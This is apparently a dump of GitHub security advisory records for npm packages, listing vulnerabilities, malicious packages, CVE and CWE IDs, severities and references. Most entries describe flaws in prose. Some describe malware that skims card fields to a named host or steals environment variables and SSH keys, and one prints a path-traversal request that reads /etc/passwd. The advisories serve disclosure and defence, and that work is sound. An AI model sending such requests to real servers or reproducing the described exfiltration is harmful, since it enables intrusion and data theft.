|
2020-06-18T19:23:17Z
|
HIGH
| null |
{'CWE-77'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-4059', 'https://github.com/mikaelbr/mversion/commit/6c76c9efd27c7ff5a5c6f187e8b7a435c4722338', 'https://github.com/mikaelbr/mversion/security/advisories/GHSA-qjg4-w4c6-f6c6'}
| null |
npm
|
GHSA-8mrf-g42m-5qc8
|
Downloads Resources over HTTP in dalek-browser-chrome-canary
|
Affected versions of `dalek-browser-chrome-canary` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `dalek-browser-chrome-canary`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10584'}
|
2021-01-08T19:09:14Z
|
2019-02-18T23:51:14Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://github.com/advisories/GHSA-8mrf-g42m-5qc8', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10584', 'https://nodesecurity.io/advisories/181', 'https://www.npmjs.com/advisories/181'}
| null |
npm
|
GHSA-3fv6-q5xv-fhpw
|
Malicious Package in coffee-project
|
Version 1.7.5 of `coffee-project` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
If version 1.7.5 of this module is found installed you will want to replace it with a version before or after 1.7.5. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
| null |
2020-08-31T18:30:12Z
|
2020-09-01T19:50:23Z
|
CRITICAL
| null | null |
{'https://www.npmjs.com/advisories/621'}
| null |
npm
|
GHSA-hwj9-h5mp-3pm3
|
Regular Expression Denial of Service in postcss
|
The npm package `postcss` from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
|
{'CVE-2021-23368'}
|
2021-06-15T15:12:13Z
|
2021-05-10T15:29:24Z
|
MODERATE
| null |
{'CWE-400'}
|
{'https://github.com/postcss/postcss/commit/b6f3e4d5a8d7504d553267f80384373af3a3dec5', 'https://lists.apache.org/thread.html/r16e295b4f02d81b79981237d602cb0b9e59709bafaa73ac98be7cef1@%3Cdev.myfaces.apache.org%3E', 'https://lists.apache.org/thread.html/rad5af2044afb51668b1008b389ac815a28ecea9eb75ae2cab5a00ebb@%3Ccommits.myfaces.apache.org%3E', 'https://lists.apache.org/thread.html/r5acd89f3827ad9a9cad6d24ed93e377f7114867cd98cfba616c6e013@%3Ccommits.myfaces.apache.org%3E', 'https://github.com/postcss/postcss/commit/8682b1e4e328432ba692bed52326e84439cec9e4', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244795', 'https://snyk.io/vuln/SNYK-JS-POSTCSS-1090595', 'https://github.com/postcss/postcss/commit/54cbf3c4847eb0fb1501b9d2337465439e849734', 'https://lists.apache.org/thread.html/r00158f5d770d75d0655c5eef1bdbc6150531606c8f8bcb778f0627be@%3Cdev.myfaces.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23368', 'https://lists.apache.org/thread.html/r49afb49b38748897211b1f89c3a64dc27f9049474322b05715695aab@%3Cdev.myfaces.apache.org%3E', 'https://lists.apache.org/thread.html/r8def971a66cf3e375178fbee752e1b04a812a047cc478ad292007e33@%3Cdev.myfaces.apache.org%3E'}
| null |
npm
|
GHSA-85cp-p426-42f5
|
Prototype Pollution in deep-get-set
|
All versions of package deep-get-set prior to version 1.1.1 are vulnerable to Prototype Pollution via the main function.
|
{'CVE-2020-7715'}
|
2021-05-05T18:16:57Z
|
2021-05-06T18:12:59Z
|
HIGH
| null |
{'CWE-1321'}
|
{'https://snyk.io/vuln/SNYK-JS-DEEPGETSET-598666', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7715', 'https://github.com/acstll/deep-get-set/commit/a127e65bc77ff5707a6a103819e140d11475c5f4'}
| null |
npm
|
GHSA-f5w6-r7rg-mcgq
|
Regular Expression Denial of Service in validator
|
Versions of `validator` prior to 3.22.1 are affected by a regular expression denial of service vulnerability in the `isURL` method.
## Recommendation
Update to version 3.22.1 or later.
|
{'CVE-2014-8882'}
|
2021-09-23T21:03:25Z
|
2020-08-31T23:01:13Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://snyk.io/vuln/npm:validator:20130705', 'https://github.com/chriso/validator.js/issues/152#issuecomment-48107184', 'https://www.npmjs.com/advisories/42', 'https://github.com/chriso/validator.js', 'https://nvd.nist.gov/vuln/detail/CVE-2014-8882'}
| null |
npm
|
GHSA-7ww4-c3mj-93cf
|
Downloads Resources over HTTP in pm2-kafka
|
Affected versions of `pm2-kafka` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `pm2-kafka`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10693'}
|
2021-01-14T15:56:19Z
|
2020-09-01T16:16:33Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10693', 'https://www.npmjs.com/advisories/299', 'https://nodesecurity.io/advisories/299'}
| null |
npm
|
GHSA-9xgh-xgw5-p5cw
|
Hijacked Environment Variables in nodemssql
|
The `nodemssql` package is a piece of malware that steals environment variables and sends them to attacker controlled locations.
All versions have been unpublished from the npm registry.
## Recommendation
As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.
If you have found this installed in your environment, you should:
1. Delete the package
2. Clear your npm cache
3. Ensure it is not present in any other package.json files on your system
4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.
Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.
|
{'CVE-2017-16057'}
|
2020-08-31T18:24:55Z
|
2018-11-09T17:42:54Z
|
MODERATE
| null |
{'CWE-506'}
|
{'https://nodesecurity.io/advisories/484', 'https://www.npmjs.com/advisories/484', 'https://github.com/advisories/GHSA-9xgh-xgw5-p5cw', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16057'}
| null |
npm
|
GHSA-7fpw-cfc4-3p2c
|
High severity vulnerability that affects passport-wsfed-saml2
|
A vulnerability has been discovered in the Auth0 passport-wsfed-saml2 library affecting versions < 3.0.5. This vulnerability allows an attacker to impersonate another user and potentially elevate their privileges if the SAML identity provider does not sign the full SAML response (e.g., only signs the assertion within the response).
|
{'CVE-2017-16897'}
|
2021-09-02T21:17:05Z
|
2017-12-28T22:51:45Z
|
HIGH
| null |
{'CWE-290'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16897', 'https://auth0.com/docs/security/bulletins/cve-2017-16897', 'https://github.com/advisories/GHSA-7fpw-cfc4-3p2c'}
| null |
npm
|
GHSA-fr76-2wp8-fp92
|
Insecure template handling in Express-handlebars
|
Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.
A fix is discussed in https://github.com/express-handlebars/express-handlebars/pull/163
|
{'CVE-2021-32820'}
|
2022-02-10T23:35:21Z
|
2022-02-10T23:35:21Z
|
HIGH
| null |
{'CWE-200'}
|
{'https://github.com/express-handlebars/express-handlebars/commit/78c47a235c4ad7bc2674bddd8ec2721567ed8c72', 'https://github.com/express-handlebars/express-handlebars#danger-', 'https://github.com/express-handlebars/express-handlebars/pull/163', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32820', 'https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/', 'https://www.npmjs.com/package/express-handlebars', 'https://github.com/express-handlebars/express-handlebars/blob/78c47a235c4ad7bc2674bddd8ec2721567ed8c72/README.md#danger-'}
| null |
npm
|
GHSA-h6q6-9hqw-rwfv
|
Misinterpretation of malicious XML input
|
### Impact
xmldom versions 0.4.0 and older do not correctly preserve [system identifiers](https://www.w3.org/TR/2008/REC-xml-20081126/#d0e4313), [FPIs](https://en.wikipedia.org/wiki/Formal_Public_Identifier) or [namespaces](https://www.w3.org/TR/xml-names11/) when repeatedly parsing and serializing maliciously crafted documents.
This may lead to unexpected syntactic changes during XML processing in some downstream applications.
### Patches
Update to 0.5.0 (once it is released)
### Workarounds
Downstream applications can validate the input and reject the maliciously crafted documents.
### References
Similar to this one reported on the Go standard library:
- https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [`xmldom/xmldom`](https://github.com/xmldom/xmldom)
* Email us: send an email to **all** addresses that are shown by `npm owner ls xmldom`
|
{'CVE-2021-21366'}
|
2021-03-12T16:21:24Z
|
2021-03-12T22:39:39Z
|
LOW
| null |
{'CWE-436', 'CWE-115'}
|
{'https://github.com/xmldom/xmldom/releases/tag/0.5.0', 'https://github.com/xmldom/xmldom/security/advisories/GHSA-h6q6-9hqw-rwfv', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21366', 'https://www.npmjs.com/package/xmldom', 'https://github.com/xmldom/xmldom/commit/d4201b9dfbf760049f457f9f08a3888d48835135'}
| null |
npm
|
GHSA-29gp-92wp-94q8
|
Remote Code Execution in react-dev-utils
|
`react-dev-utils` on Windows is vulnerable to remote code execution.
## Recommendation
Update to one of the follow versions, depending on the release line that you are using.
- 1.0.4
- 2.0.2
- 3.1.2
- 4.2.2
- 5.0.2
- 6.0.0-next.a671462c
|
{'CVE-2018-6342'}
|
2021-01-08T20:09:17Z
|
2019-01-04T17:41:20Z
|
HIGH
| null |
{'CWE-78'}
|
{'https://github.com/facebook/create-react-app/pull/4866', 'https://www.npmjs.com/advisories/695', 'https://github.com/facebook/create-react-app/releases/tag/v1.1.5', 'https://github.com/advisories/GHSA-29gp-92wp-94q8', 'https://nvd.nist.gov/vuln/detail/CVE-2018-6342'}
| null |
npm
|
GHSA-m9r7-q9fc-qwx5
|
Malicious Package in maybemaliciouspackage
|
All versions of `maybemaliciouspackage` contain malicious code. The package prints the system's SSH keys to the console as a postinstall script.
## Recommendation
Remove the package from your environment. There are no further signs of compromise.
| null |
2021-09-30T17:43:47Z
|
2020-09-03T17:22:24Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1042'}
| null |
npm
|
GHSA-hqv3-qq72-78cv
|
Directory Traversal in startserver
|
All versions of package startserver are vulnerable to Directory Traversal due to missing sanitization.
|
{'CVE-2021-23430'}
|
2021-08-25T19:03:15Z
|
2021-09-02T17:09:40Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://snyk.io/vuln/SNYK-JS-STARTSERVER-1296388', 'https://github.com/xudafeng/startserver/blob/bef0c4e4d21da42a40ce87cf25fd54ac8d8cb2d8/lib/index.js%23L71', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23430', 'https://github.com/xudafeng/startserver'}
| null |
npm
|
GHSA-jxqq-cqm6-pfq9
|
Regular Expression Denial of Service in slug
|
Affected versions of `slug` are vulnerable to a regular expression denial of service when parsing untrusted user input.
The issue is low severity, as it takes 50,000 characters to cause the event loop to block for 2 seconds,
About 50k characters can block the event loop for 2 seconds.
## Recommendation
Update to version 0.9.2 or later.
|
{'CVE-2017-16117'}
|
2020-08-31T18:26:54Z
|
2018-07-24T20:06:45Z
|
MODERATE
| null |
{'CWE-400'}
|
{'https://www.npmjs.com/advisories/537', 'https://github.com/advisories/GHSA-jxqq-cqm6-pfq9', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16117', 'https://github.com/dodo/node-slug/issues/82', 'https://nodesecurity.io/advisories/537'}
| null |
npm
|
GHSA-g87g-4x3w-f8jp
|
Directory Traversal in serverwzl
|
Affected versions of `serverwzl` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16105'}
|
2020-08-31T18:20:29Z
|
2020-09-01T16:51:28Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16105', 'https://www.npmjs.com/advisories/363', 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/serverwzl', 'https://nodesecurity.io/advisories/363'}
| null |
npm
|
GHSA-qxrj-x7rm-2h49
|
Malicious Package in dhkey
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T21:01:13Z
|
2020-09-03T17:05:59Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1394'}
| null |
npm
|
GHSA-pq37-4c4g-v38c
|
Cross-site Scripting in vditor
|
vditor prior to version 3.8.11 is vulnerable to cross-site scripting.
|
{'CVE-2022-0341'}
|
2022-03-23T13:54:04Z
|
2022-03-15T00:01:02Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/vanessa219/vditor/commit/219f8a9e272aba3cbc0096a82cac776532dbb9e5', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0341', 'https://github.com/vanessa219/vditor', 'https://github.com/Vanessa219/vditor/issues/1102', 'https://huntr.dev/bounties/fa546b57-bc15-4705-824e-9474b616f628'}
| null |
npm
|
GHSA-4j54-mmmv-hjpm
|
Malicious Package in slush-fullstack-framework
|
Version 0.9.2 of `slush-fullstack-framework` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
| null |
2020-08-31T18:47:33Z
|
2020-09-03T19:17:51Z
|
CRITICAL
| null | null |
{'https://www.npmjs.com/advisories/1108'}
| null |
npm
|
GHSA-qf8x-vqjv-92gr
|
Authentication bypass and denial of service (DoS) vulnerabilities in Apple Game Center auth adapter
|
Weak validation of the Apple certificate URL in the Apple Game Center authentication adapter allows to bypass authentication and makes the server vulnerable to DoS attacks. The vulnerability has been fixed by improving the URL validation and adding additional checks of the resource the URL points to before downloading it.
|
{'CVE-2022-24901'}
|
2022-05-04T18:59:46Z
|
2022-05-04T18:59:46Z
|
HIGH
| null |
{'CWE-287', 'CWE-295'}
|
{'https://github.com/parse-community/parse-server/commit/af4a0417a9f3c1e99b3793806b4b18e04d9fa999', 'https://github.com/parse-community/parse-server/', 'https://github.com/parse-community/parse-server/security/advisories/GHSA-qf8x-vqjv-92gr', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24901'}
| null |
npm
|
GHSA-pv6r-vchh-cxg9
|
Denial of Service in apostrophe
|
Versions of `apostrophe` prior to 2.97.1 are vulnerable to Denial of Service. The `apostrophe-jobs` module sets a callback for incoming jobs and doesn't clear it regardless of its status. This causes the server to accumulate callbacks, allowing an attacker to start a large number of jobs and exhaust system memory.
## Recommendation
Upgrade to version 2.97.1 or later.
| null |
2020-08-31T18:50:15Z
|
2020-09-03T20:42:09Z
|
LOW
| null |
{'CWE-400'}
|
{'https://www.npmjs.com/advisories/1183'}
| null |
npm
|
GHSA-238x-q7xf-p4xw
|
Downloads Resources over HTTP in arrayfire-js
|
Affected versions of `arrayfire-js` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `arrayfire-js`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10598'}
|
2021-01-08T20:10:36Z
|
2019-02-18T23:50:32Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://nodesecurity.io/advisories/192', 'https://www.npmjs.com/advisories/192', 'https://github.com/advisories/GHSA-238x-q7xf-p4xw', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10598'}
| null |
npm
|
GHSA-m8xj-5v73-3hh8
|
curlrequest allows execution of arbitrary commands
|
curlrequest through 1.0.1 allows execution of arbitrary commands. It is possible to inject arbitrary commands by using a semicolon char in any of the `options` values.
|
{'CVE-2020-7646'}
|
2021-08-25T21:07:36Z
|
2020-05-13T16:29:43Z
|
CRITICAL
| null |
{'CWE-78'}
|
{'https://github.com/node-js-libs/curlrequest', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7646', 'https://github.com/node-js-libs/curlrequest/blob/master/index.js#L239,', 'https://snyk.io/vuln/SNYK-JS-CURLREQUEST-568274'}
| null |
npm
|
GHSA-gm9g-2g8v-fvxj
|
Prototype Pollution in upmerge
|
All versions of `upmerge` are vulnerable to Prototype Pollution. The merge() function fails to prevent user input to alter an Object's prototype, allowing attackers to modify override properties of all objects in the application. This may lead to Denial of Service or may be chained with other vulnerabilities leading to Remote Code Execution.
## Recommendation
No fix is currently available. Consider using an alternative module until a fix is made available.
| null |
2021-09-16T20:59:20Z
|
2019-06-06T15:32:28Z
|
MODERATE
| null |
{'CWE-345', 'CWE-400'}
|
{'https://github.com/jazzfog/UpMerge', 'https://www.npmjs.com/advisories/809', 'https://snyk.io/vuln/SNYK-JS-UPMERGE-174133', 'https://hackerone.com/reports/439120'}
| null |
npm
|
GHSA-9cw2-jqp5-7x39
|
Multiple Content Injection Vulnerabilities in marked
|
Versions 0.3.0 and earlier of `marked` are affected by two cross-site scripting vulnerabilities, even when `sanitize: true` is set.
The attack vectors for this vulnerability are GFM Codeblocks and JavaScript URLs.
## Recommendation
Upgrade to version 0.3.1 or later.
|
{'CVE-2014-3743'}
|
2021-09-23T20:56:39Z
|
2020-08-31T22:52:52Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2014-1850', 'https://www.npmjs.com/advisories/22'}
| null |
npm
|
GHSA-27v7-qhfv-rqq8
|
Insecure Credential Storage in web3
|
All versions of `web3` are vulnerable to Insecure Credential Storage. The package stores encrypted wallets in local storage and requires a password to load the wallet. Once the wallet is loaded, the private key is accessible via LocalStorage. Exploiting this vulnerability likely requires a Cross-Site Scripting vulnerability to access the private key.
## Recommendation
No fix is currently available. Consider using an alternative module until a fix is made available.
| null |
2021-08-31T20:56:47Z
|
2019-05-30T17:26:30Z
|
LOW
| null | null |
{'https://snyk.io/vuln/SNYK-JS-WEB3-174533', 'https://github.com/ethereum/web3.js', 'https://www.npmjs.com/advisories/877', 'https://github.com/ethereum/web3.js/issues/2739'}
| null |
npm
|
GHSA-pxcc-hj8w-fmm7
|
Command injection vulnerability in @prisma/sdk in getPackedPackage function
|
### Impact
As of today, we are not aware of any Prisma users or external consumers of the `@prisma/sdk` package who are affected by this security vulnerability.
This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.
It only affects the `getPackedPackage` function and this function is not advertised and only used for tests & building our CLI, no malicious code was found after checking our codebase.
### Patches
Fixed in
- @prisma/sdk@2.20.0 (latest channel)
- @prisma/sdk@2.20.0-dev.29 (dev channel)
Pull Request closing this vulnerability [https://github.com/prisma/prisma/pull/6245](https://github.com/prisma/prisma/pull/6245)
### Acknowledgements
This issue was discovered and reported by GitHub Engineer [@erik-krogh (Erik Krogh Kristensen)](https://github.com/erik-krogh).
### For more information
If you have any questions or comments about this advisory:
- Create a discussion in [the Prisma repository](https://github.com/prisma/prisma/discussions)
- Email us at security@prisma.io
|
{'CVE-2021-21414'}
|
2021-03-31T18:00:32Z
|
2021-04-06T17:25:12Z
|
HIGH
| null |
{'CWE-78'}
|
{'https://security.netapp.com/advisory/ntap-20210618-0003/', 'https://github.com/prisma/prisma/pull/6245', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21414', 'https://github.com/prisma/prisma/security/advisories/GHSA-pxcc-hj8w-fmm7'}
| null |
npm
|
GHSA-73v8-v6g4-vrpm
|
Arbitrary File Overwrite in decompress-zip
|
Vulnerable versions of `decompress-zip` are affected by the Zip-Slip vulnerability, an arbitrary file write vulnerability. The vulnerability occurs because `decompress-zip` does not verify that extracted files do not resolve to targets outside of the extraction root directory.
## Recommendation
For `decompress-zip` 0.2.x upgrade to 0.2.2 or later.
For `decompress-zip` 0.3.x upgrade to 0.3.2 or later.
| null |
2020-08-31T18:35:21Z
|
2020-09-02T15:58:13Z
|
HIGH
| null | null |
{'https://snyk.io/research/zip-slip-vulnerability', 'https://github.com/nodejs/security-wg/blob/master/vuln/npm/488.json', 'https://www.npmjs.com/advisories/777'}
| null |
npm
|
GHSA-79jw-6wg7-r9g4
|
Use of Potentially Dangerous Function in mixme
|
### Impact
In Node.js mixme v0.5.0, an attacker can add or alter properties of an object via 'proto' through the mutate() and merge() functions. The polluted attribute will be directly assigned to every object in the program. This will put the availability of the program at risk causing a potential denial of service (DoS).
### Patches
The problem is corrected starting with version 0.5.1.
### References
Issue: https://github.com/adaltas/node-mixme/issues/1
Commit: https://github.com/adaltas/node-mixme/commit/cfd5fbfc32368bcf7e06d1c5985ea60e34cd4028
|
{'CVE-2021-29491'}
|
2021-05-07T21:13:59Z
|
2021-05-06T15:45:39Z
|
HIGH
| null |
{'CWE-913'}
|
{'https://security.netapp.com/advisory/ntap-20210622-0002/', 'https://github.com/adaltas/node-mixme/security/advisories/GHSA-79jw-6wg7-r9g4', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29491'}
| null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.